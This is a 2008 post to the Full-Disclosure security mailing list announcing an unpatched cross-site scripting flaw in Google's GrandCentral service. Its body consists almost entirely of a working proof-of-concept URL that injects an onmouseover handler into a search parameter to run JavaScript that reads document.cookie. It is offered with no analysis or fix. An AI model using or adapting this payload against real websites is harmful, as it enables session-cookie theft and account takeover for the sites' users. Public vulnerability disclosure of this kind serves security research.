
Date: Sun, 1 Jun 2008 13:00:25 -0700
From: "Kristian Erik Hermansen" <kristian.hermansen@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Google GrandCentral XSS 0day

Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=
-- 
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
